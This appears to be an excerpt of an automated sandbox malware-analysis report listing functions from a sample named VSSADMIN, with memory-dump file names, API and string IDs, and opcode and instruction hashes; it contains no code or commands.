                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                      • API String ID: 3215553584-1196891531
                                                                                                                                                                      • Opcode ID: 04f77fab494744c2c515884d2b3c345e4279dac145e4d051e3529eeeffec7512
                                                                                                                                                                      • Instruction ID: aa3a720b874d36c084131063d99b8c27c6138291c7ad935d2146308197c8cf15
                                                                                                                                                                      • Opcode Fuzzy Hash: 04f77fab494744c2c515884d2b3c345e4279dac145e4d051e3529eeeffec7512
                                                                                                                                                                      • Instruction Fuzzy Hash: 65819C76E0CA5385F7A58E2981F027826B0AB57FA8F558037CB0AD7295DF2DF901A701
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C7E138 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CallEncodePointerTranslator
                                                                                                                                                                      • String ID: MOC$RCC
                                                                                                                                                                      • API String ID: 3544855599-2084237596
                                                                                                                                                                      • Opcode ID: 07a38d77025e1089ea1fead6d05a91cb43271034c61875b0f20f744d27a01972
                                                                                                                                                                      • Instruction ID: 7708ddf7471669cd0a157c1e602e52a9422c251f8d813d077829149fa74f7ee6
                                                                                                                                                                      • Opcode Fuzzy Hash: 07a38d77025e1089ea1fead6d05a91cb43271034c61875b0f20f744d27a01972
                                                                                                                                                                      • Instruction Fuzzy Hash: CC614937A08A858AEB10CF65D4812AD77B0FB46BA9F044226EF4D57B99CF38E155CB40
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C7E494 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                      • String ID: csm$csm
                                                                                                                                                                      • API String ID: 3896166516-3733052814
                                                                                                                                                                      • Opcode ID: 15a90b008ee0b5328ce42465ae6c6f27eb603fbbd906650bc51354757df09ebd
                                                                                                                                                                      • Instruction ID: 016219f5bc2cb5ea05b40b06f03e317a7a95fdaf72173b25056b4d9c293bcfaf
                                                                                                                                                                      • Opcode Fuzzy Hash: 15a90b008ee0b5328ce42465ae6c6f27eb603fbbd906650bc51354757df09ebd
                                                                                                                                                                      • Instruction Fuzzy Hash: 50517A3390CA8687EA648F1595C43697BB0FB56FBAF144136DA9C87A95CF3CE4518B00
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFD3FBF2838 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 137COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245453028.00007FFD3FBF1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBF0000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245445748.00007FFD3FBF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FBFD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC55000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC69000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC79000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC8D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE3D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE3F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE6A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE9C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FEC1000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF0F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF15000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF17000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF34000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF41000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245636932.00007FFD3FF45000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245643822.00007FFD3FF47000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffd3fbf0000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: ..\s\crypto\async\async.c$T
                                                                                                                                                                      • API String ID: 0-2182492907
                                                                                                                                                                      • Opcode ID: 8799e63865a8e293b2cab40001efc82bfd0813cd488136d79b3b43ff1dce89a6
                                                                                                                                                                      • Instruction ID: 802f9e945951e5ce30d473741f45b7def3440447b2cf75787304d1e3b900e9b5
                                                                                                                                                                      • Opcode Fuzzy Hash: 8799e63865a8e293b2cab40001efc82bfd0813cd488136d79b3b43ff1dce89a6
                                                                                                                                                                      • Instruction Fuzzy Hash: 62519C76B0CB4A82EB289B21E4606BD7760EF84B80F404435DB4D57B96DFBDE919E700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFD3FCB6E10 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 129networkCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245453028.00007FFD3FC8D000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBF0000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245445748.00007FFD3FBF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FBF1000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FBFD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC55000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC69000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC79000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE3D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE3F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE6A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE9C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FEC1000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF0F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF15000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF17000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF34000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF41000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245636932.00007FFD3FF45000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245643822.00007FFD3FF47000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffd3fbf0000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: getnameinfohtons
                                                                                                                                                                      • String ID: $..\s\crypto\bio\b_addr.c
                                                                                                                                                                      • API String ID: 1503050688-1606403076
                                                                                                                                                                      • Opcode ID: 79083cb44701e26ed1c7acd577477c0fca6b9dec1374fd547b361c2cd0386f0a
                                                                                                                                                                      • Instruction ID: ee68aec3bfb67ae4dec67756e0652d1c0f792339f9932293b33137c4dd975f67
                                                                                                                                                                      • Opcode Fuzzy Hash: 79083cb44701e26ed1c7acd577477c0fca6b9dec1374fd547b361c2cd0386f0a
                                                                                                                                                                      • Instruction Fuzzy Hash: 4051D166B1864F82FB689F21E0617BD73A0EB80744F404036EB8D07685DF7DE895A701
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFD3FBF3846 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 82COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245453028.00007FFD3FBF1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBF0000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245445748.00007FFD3FBF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FBFD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC55000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC69000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC79000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC8D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE3D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE3F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE6A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE9C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FEC1000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF0F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF15000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF17000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF34000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF41000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245636932.00007FFD3FF45000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245643822.00007FFD3FF47000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffd3fbf0000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: ..\s\crypto\bio\b_sock.c$J$host=
                                                                                                                                                                      • API String ID: 0-1729655730
                                                                                                                                                                      • Opcode ID: 941f2fbceea9f6781c3ad95e534017a9b341198856a0048fa999bb3705f921b3
                                                                                                                                                                      • Instruction ID: 166de83356c025221d51ff2333b3fa5389908e8c653f5ff2cb5c0bf4ec04eee3
                                                                                                                                                                      • Opcode Fuzzy Hash: 941f2fbceea9f6781c3ad95e534017a9b341198856a0048fa999bb3705f921b3
                                                                                                                                                                      • Instruction Fuzzy Hash: 8231D076B0C64682EB18DB65F4A116EB360FB84790F400035EF8C83B9ADF7DD9549B00
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C724D0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Message$ByteCharMultiWide
                                                                                                                                                                      • String ID: %s%s: %s$Fatal error detected
                                                                                                                                                                      • API String ID: 1878133881-2410924014
                                                                                                                                                                      • Opcode ID: 4ccfa1ca3bcae5acffff1ea197f60ccb63abed4ad3799bdff7ceda7eadf1df34
                                                                                                                                                                      • Instruction ID: 0cabe60dd2f0317458d7cc8b18423016e7112c85527d09ac3810cd807fd967c8
                                                                                                                                                                      • Opcode Fuzzy Hash: 4ccfa1ca3bcae5acffff1ea197f60ccb63abed4ad3799bdff7ceda7eadf1df34
                                                                                                                                                                      • Instruction Fuzzy Hash: B831857262CA8292EA30D714E4916EA6374FF85F94F804037E68D87A99DF3DD345CB40
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFD3FBF1C76 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 57COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245453028.00007FFD3FBF1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBF0000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245445748.00007FFD3FBF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FBFD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC55000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC69000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC79000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC8D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE3D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE3F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE6A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE9C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FEC1000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF0F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF15000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF17000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF34000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF41000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245636932.00007FFD3FF45000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245643822.00007FFD3FF47000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffd3fbf0000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: 00007
                                                                                                                                                                      • String ID: ..\s\crypto\pem\pem_pkey.c$DH PARAMETERS$X9.42 DH PARAMETERS
                                                                                                                                                                      • API String ID: 3568877910-3633731555
                                                                                                                                                                      • Opcode ID: be9e9573787046a801f6411ee9a5367fe782c2cd32758e05b582aaf67fa49e75
                                                                                                                                                                      • Instruction ID: 8181e4560066208bd1a2181c709ea145e92d3fb7a201476ce45fd2ce21a84222
                                                                                                                                                                      • Opcode Fuzzy Hash: be9e9573787046a801f6411ee9a5367fe782c2cd32758e05b582aaf67fa49e75
                                                                                                                                                                      • Instruction Fuzzy Hash: A0218CA2B08B4AC1EE54DB55E4201AAB7A0EF84794F444032EB8C47B99EF7DE554EB00
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFD3FBF139D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38networkCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245453028.00007FFD3FBF1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBF0000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245445748.00007FFD3FBF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FBFD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC55000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC69000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC79000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC8D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE3D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE3F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE6A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE9C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FEC1000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF0F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF15000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF17000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF34000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF41000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245636932.00007FFD3FF45000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245643822.00007FFD3FF47000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffd3fbf0000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLastsocket
                                                                                                                                                                      • String ID: ..\s\crypto\bio\b_sock2.c$2
                                                                                                                                                                      • API String ID: 1120909799-2051290508
                                                                                                                                                                      • Opcode ID: b87478d39e550b6278b10c6495ad9d7c2480af2d970ddb1f34380d70319f0b12
                                                                                                                                                                      • Instruction ID: b7dae9cd0ce5ed7c1a6189eb1478c9496da866e3f12e899445b48ade3d407241
                                                                                                                                                                      • Opcode Fuzzy Hash: b87478d39e550b6278b10c6495ad9d7c2480af2d970ddb1f34380d70319f0b12
                                                                                                                                                                      • Instruction Fuzzy Hash: 3801F572B0864A83E7149B25F4505AD7720FF40764F204235EB6C43AE5CF3DD915DB40
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C73BC0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(?,00007FF614C736B9), ref: 00007FF614C73BF1
                                                                                                                                                                        • Part of subcall function 00007FF614C72620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF614C77774,?,?,?,?,?,?,?,?,?,?,?,00007FF614C7101D), ref: 00007FF614C72654
                                                                                                                                                                        • Part of subcall function 00007FF614C72620: MessageBoxW.USER32 ref: 00007FF614C72730
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorFileLastMessageModuleName
                                                                                                                                                                      • String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
                                                                                                                                                                      • API String ID: 2581892565-1977442011
                                                                                                                                                                      • Opcode ID: 1e1fb772b1588bb2ef8aa65086850d6655ce62306cfd8bfdc61953077b8dd8c7
                                                                                                                                                                      • Instruction ID: 711d856276ce07ae2e7d2679d58a58d86320b1af73e45da33f543d676ac51ce5
                                                                                                                                                                      • Opcode Fuzzy Hash: 1e1fb772b1588bb2ef8aa65086850d6655ce62306cfd8bfdc61953077b8dd8c7
